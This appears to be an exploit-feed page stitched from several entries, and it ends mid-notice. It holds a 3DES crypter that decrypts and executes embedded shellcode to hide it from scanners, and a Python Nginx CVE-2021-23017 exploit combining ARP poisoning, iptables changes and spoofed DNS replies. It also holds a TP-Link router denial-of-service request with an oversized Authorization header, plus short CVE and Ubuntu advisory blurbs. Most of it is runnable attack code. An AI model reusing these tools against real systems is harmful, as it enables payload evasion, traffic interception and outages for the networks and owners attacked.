    # Exploit Title: 3DES Shellcode crypter# Date: 08/07/2022# Exploit Author: d7x# Tested on: Ubuntu x86 / Ubuntu x86_64 / Debian 11 "bullseye"cat > 3des_crypter.c << EOF/* *** * *  3DES Shellcode crypter by d7x * *  d7x.promiselabs.net * *  Usage: gcc -fno-stack-protector -zexecstack -m32 -o 3des_crypter 3des_crypter.c -lssl -lcrypto * * ***/#include <stdio.h>#include <stdlib.h>#include <string.h>#include <openssl/des.h>/* Triple DES key for Encryption and Decryption */DES_cblock Key1 = "3DES";DES_cblock Key2 = "Crypter";DES_cblock Key3 = "by d7x";DES_key_schedule SchKey1,SchKey2,SchKey3;/* Print Encrypted and Decrypted bytes */void print_data(const char *tittle, const void* data, int len);int main(){  /* Apply 3DES keys */   DES_set_key((DES_cblock *)Key1, &SchKey1);  DES_set_key((DES_cblock *)Key2, &SchKey2);  DES_set_key((DES_cblock *)Key3, &SchKey3);  /* Place shellcode here */  unsigned char input_data[] = "\xbb\xcc\xfe\x70\x5c\xdb\xd8\xd9\x74\x24\xf4\x5d\x29\xc9\xb1\x08\x83\xc5\x04\x31\x5d\x11\x03\x5d\x11\xe2\x39\x67\x1a\x53\x99\xca\x33\x6c\x19\xeb\xc3\x5c\x6d\x86\xb3\x8d\xeb\x58\x6f\xba\x0c\x59\x8f\x3a\xab\x97\x0f\x50\x4a\x70\xdd\x25";   /* => chmods /tmp/f to 0777 */  /* Init vector */  DES_cblock iv = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };  // DES_cblock iv = { 0xe1, 0xe2, 0xe3, 0xd4, 0xd5, 0xc6, 0xc7, 0xa8 };  DES_set_odd_parity(&iv);    /* Check for Weak key generation: https://www.openssl.org/docs/manmaster/man3/DES_set_key_checked.html,     * If the key is a weak key, then -2 is returned */  if ( -2 == (DES_set_key_checked(&Key1, &SchKey1) || DES_set_key_checked(&Key2, &SchKey2) || DES_set_key_checked(&Key3, &SchKey3)))  {    printf(" Weak key ....\n");    return 1;  }    /* Buffers for Encryption and Decryption */  unsigned char* cipher[sizeof(input_data)];  unsigned char* text[sizeof(input_data)];    /* Triple-DES CBC Encryption */  DES_ede3_cbc_encrypt( (unsigned char*)input_data, (unsigned char*)cipher, sizeof(input_data), &SchKey1, &SchKey2, &SchKey3,&iv, DES_ENCRYPT);    /* Triple-DES CBC Decryption */  memset(iv,0,sizeof(DES_cblock)); // You need to start with the same iv value  DES_set_odd_parity(&iv);  DES_ede3_cbc_encrypt( (unsigned char*)cipher, (unsigned char*)text, sizeof(input_data), &SchKey1, &SchKey2, &SchKey3,&iv,DES_DECRYPT);  /* Place the encrypted output here to verify the integrity */  unsigned char c[] = \"\xd5\x0c\x1e\xee\xfd\x1f\xb4\x50\xac\xde\x1a\x59\x4c\x10\xe9\x7a\x2c\xb0\x09\x79\x2c\xe0\x28\x17\xf4\x60\xc9\x0a\x33\x27\x48\x03\xc4\x8d\x4d\x26\x0b\x7c\xdd\xa9\xcf\x65\x0f\xac\xd3\xc2\xa8\x67\xde\xf6\x83\x02\x8a\x01\xa8\x1f\x95\x23\x94\x25\xdf\xce\xa3\x79\x0c\xdc\x81\xf7";  unsigned char decrypted[sizeof(c)];  // DES_set_odd_parity(&iv);  memset(iv,0,sizeof(DES_cblock)); // You need to start with the same iv value  DES_set_odd_parity(&iv);  DES_ede3_cbc_encrypt( (unsigned char*)c, (unsigned char*)decrypted, sizeof(c), &SchKey1, &SchKey2, &SchKey3,&iv,DES_DECRYPT);    /* Printing and Verifying */  print_data("\n Original ",input_data,strlen(input_data));  print_data("\n Encrypted",cipher,strlen(cipher));  print_data("\n Decrypted",text,strlen(input_data));  print_data("\n Decrypted (manual) ",decrypted,strlen(decrypted));  /* Run shellcode */  /* int (*ret)() = (int(*)())decrypted;  ret(); */    return 0;}void print_data(const char *tittle, const void* data, int len){  printf("%s : ",tittle);  const unsigned char * p = (const unsigned char*)data;  int i = 0;    /* len-1 to omit the \x00 null terminator at the end */  for (; i<len;++i)    printf("\\x%02x", *p++);  printf(" Size: %d", len);    printf("\n");}EOFcat > 3des_decrypt.c << EOF/* *** * *  3DES Shellcode crypter by d7x * *  d7x.promiselabs.net * *  Usage: gcc -fno-stack-protector -zexecstack -m32 -o 3des_decrypt 3des_decrypt.c -lssl -lcrypto * * ***/#include <stdio.h>#include <stdlib.h>#include <string.h>#include <openssl/des.h>/* Triple DES key for Encryption and Decryption */DES_cblock Key1 = "3DES";DES_cblock Key2 = "Crypter";DES_cblock Key3 = "by d7x";DES_key_schedule SchKey1,SchKey2,SchKey3;/* Print Encrypted and Decrypted data packets */void print_data(const char *tittle, const void* data, int len);main(){  /* Apply 3DES keys */  DES_set_key((DES_cblock *)Key1, &SchKey1);  DES_set_key((DES_cblock *)Key2, &SchKey2);  DES_set_key((DES_cblock *)Key3, &SchKey3);  /* Encrypted shellcode generated by 3des_crypter */  unsigned char shellcode_3des[] = \"\xd5\x0c\x1e\xee\xfd\x1f\xb4\x50\xac\xde\x1a\x59\x4c\x10\xe9\x7a\x2c\xb0\x09\x79\x2c\xe0\x28\x17\xf4\x60\xc9\x0a\x33\x27\x48\x03\xc4\x8d\x4d\x26\x0b\x7c\xdd\xa9\xcf\x65\x0f\xac\xd3\xc2\xa8\x67\xde\xf6\x83\x02\x8a\x01\xa8\x1f\x95\x23\x94\x25\xdf\xce\xa3\x79\x44\x5d\x82\xff\x40\x5d\x82\xff\x06";  /* Init vector */  DES_cblock iv = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 };  DES_set_odd_parity(&iv);    /* buffer for the decrypted string */  unsigned char* decrypted[sizeof(shellcode_3des)];  /* Triple-DES CBC Decryption */  memset(iv,0,sizeof(DES_cblock)); // You need to start with the same iv value  DES_set_odd_parity(&iv);  DES_ede3_cbc_encrypt( (unsigned char*)shellcode_3des, (unsigned char*)decrypted, sizeof(shellcode_3des), &SchKey1, &SchKey2, &SchKey3,&iv,DES_DECRYPT);    memcpy(shellcode_3des, decrypted, strlen(decrypted) );  // strcpy(shellcode_3des, decrypted);  /* Printing and executing */  print_data("\n Encrypted",shellcode_3des,sizeof(shellcode_3des));  print_data("\n Decrypted",decrypted,strlen(decrypted));  /* Run shellcode */  int (*ret)() = (int(*)())shellcode_3des;   ret();    return 0;}void print_data(const char *tittle, const void* data, int len){  printf("%s : ",tittle);  const unsigned char * p = (const unsigned char*)data;  int i = 0;  /* len-1 to omit the \x00 null terminator at the end */  for (; i<len;++i)    printf("\\x%02x", *p++);  printf(" Size: %d", len);    printf("\n");} EOF

3DES Shellcode Crypter

Nginx version 1.20.0 suffers from a denial of service vulnerability.

    # Exploit Title: Nginx 1.20.0 - Denial of Service (DOS)# Date: 2022-6-29# Exploit Author: Mohammed Alshehri - https://Github.com/M507# Vendor Homepage: https://nginx.org/# Software Link: https://github.com/nginx/nginx/releases/tag/release-1.20.0# Version: 0.6.18 - 1.20.0# Tested on: Ubuntu 18.04.4 LTS bionic # CVE: CVE-2021-23017# The bug was discovered by X41 D-SEC GmbH, Luis Merino, Markus Vervier, Eric Sesterhenn# python3 poc.py --target 172.1.16.100 --dns_server 172.1.16.1# The service needs to be configured to use Nginx resolverfrom scapy.all import *from multiprocessing import Processfrom binascii import hexlify, unhexlifyimport argparse, time, osdef device_setup():    os.system("echo '1' >> /proc/sys/net/ipv4/ip_forward")    os.system("iptables -A FORWARD -p UDP --dport 53 -j DROP")def ARPP(target, dns_server):    print("[*] Sending poisoned ARP packets")    target_mac = getmacbyip(target)    dns_server_mac = getmacbyip(dns_server)    while True:        time.sleep(2)        send(ARP(op=2, pdst=target, psrc=dns_server, hwdst=target_mac),verbose = 0)        send(ARP(op=2, pdst=dns_server, psrc=target, hwdst=dns_server_mac),verbose = 0)def exploit(target):    print("[*] Listening ")    sniff (filter="udp and port 53 and host " + target, prn = process_received_packet)"""RFC schema 0                   1                   2                   3 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+|             LENGTH            |               ID              |+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+|Q| OPCODE|A|T|R|R|Z|A|C| RCODE |            QDCOUNT            |+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+|            ANCOUNT            |            NSCOUNT            |+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+|            ARCOUNT            |               QD              |+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+|               AN              |               NS              |+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+|               AR              |+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+Fig. DNS                             """def process_received_packet(received_packet):    if received_packet[IP].src == target_ip:        if received_packet.haslayer(DNS):            if DNSQR in received_packet:                print("[*] the received packet: " + str(bytes_hex(received_packet)))                print("[*] the received DNS request: " + str(bytes_hex(received_packet[DNS].build())))                try:                    # \/    the received DNS request                    dns_request = received_packet[DNS].build()                    null_pointer_index = bytes(received_packet[DNS].build()).find(0x00,12)                    print("[*] debug: dns_request[:null_pointer_index] : "+str(hexlify(dns_request[:null_pointer_index])))                    print("[*] debug: dns_request[null_pointer_index:] : "+str(hexlify(dns_request[null_pointer_index:])))                    payload = [                        dns_request[0:2],                        b"\x81\x80\x00\x01\x00\x01\x00\x00\x00\x00",                        dns_request[12:null_pointer_index+1],                        dns_request[null_pointer_index+1:null_pointer_index+3],                        dns_request[null_pointer_index+3:null_pointer_index+5],                        b"\xC0\x0C\x00\x05\x00\x01\x00\x00\x0E\x10",                        b"\x00\x0B\x18\x41\x41\x41\x41\x41\x41\x41",                        b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41",                        b"\x41\x41\x41\x41\x41\x41\x41\xC0\x04"                    ]                                        payload = b"".join(payload)                    spoofed_pkt = (Ether()/IP(dst=received_packet[IP].src, src=received_packet[IP].dst)/\                        UDP(dport=received_packet[UDP].sport, sport=received_packet[UDP].dport)/\                        payload)                    print("[+] dns answer: "+str(hexlify(payload)))                    print("[+] full packet: " + str(bytes_hex(spoofed_pkt)))                    sendp(spoofed_pkt, count=1)                    print("\n[+] malicious answer was sent")                    print("[+] exploited\n")                except:                    print("\n[-] ERROR")def main():    global target_ip    parser = argparse.ArgumentParser()    parser.add_argument("-t", "--target", help="IP address of the target")    parser.add_argument("-r", "--dns_server", help="IP address of the DNS server used by the target")    args = parser.parse_args()    target_ip = args.target    dns_server_ip = args.dns_server    device_setup()    processes_list = []    ARPPProcess = Process(target=ARPP,args=(target_ip,dns_server_ip))    exploitProcess = Process(target=exploit,args=(target_ip,))    processes_list.append(ARPPProcess)    processes_list.append(exploitProcess)    for process in processes_list:        process.start()    for process in processes_list:        process.join()if __name__ == '__main__':    target_ip = ""    main()

Nginx 1.20.0 Denial Of Service

File upload vulnerability in GFI Mail Archiver versions up to and including 15.1 via insecure implementation of Telerik Web UI plugin which is affected by CVE-2014-2217, and CVE-2017-11317.

CVE-2021-29281: Unrestricted File Upload | OWASP Foundation

An infinite loop in the function httpRpmPass of TP-Link TL-WR741N/TL-WR742N V1/V2/V3_130415 allows attackers to cause a Denial of Service (DoS) via a crafted packet.

we can get firmware in TL-WR741N \_TL-WR742N V1/V2/V3\_130415标准版 - TP-LINK 服务支持

Recurring vulnerabilities and POC

haven’t logged in

this is poc

GET http://192.168.1.1/

Host: 192.168.1.1

User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:73.0) Gecko/20100101 Firefox/73.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,_/_;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: keep-alive

Upgrade-Insecure-Requests: 1

Cache-Control: max-age=0, no-cache

Authorization: Basic MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTE6MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ====MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTE6MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ====MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTE6MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ====MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTE6MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ====MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTE6MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ====MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTE6MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ====MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTE6MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ====MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTE6MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ====MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTE6MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ====MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTE6MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ====MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTE6MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ====MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTE6MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ====MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTE6MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ====MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTE6MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ====MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTE6MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ====MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMQ==

Pragma: no-cache

send it and cause dos

browser cant load anything

Vulnerability details：

file is in /usr/bin/http and the vulnerable function is “httpRpmPass”

do not check the length of input data

we can see that the attacker can send a huge package to cause a dos.

CVE-2022-32058: CVE/TP-Link TL-WR741NTL-WR742N .md at main · whiter6666/CVE

Ubuntu Security Notice 5505-1 - Norbert Slusarek discovered a race condition in the CAN BCM networking protocol of the Linux kernel leading to multiple use-after-free vulnerabilities. A local attacker could use this issue to execute arbitrary code. Likang Luo discovered that a race condition existed in the Bluetooth subsystem of the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-5505-1  
July 07, 2022

linux-lts-xenial, linux-kvm vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 16.04 ESM  
- Ubuntu 14.04 ESM

Summary:

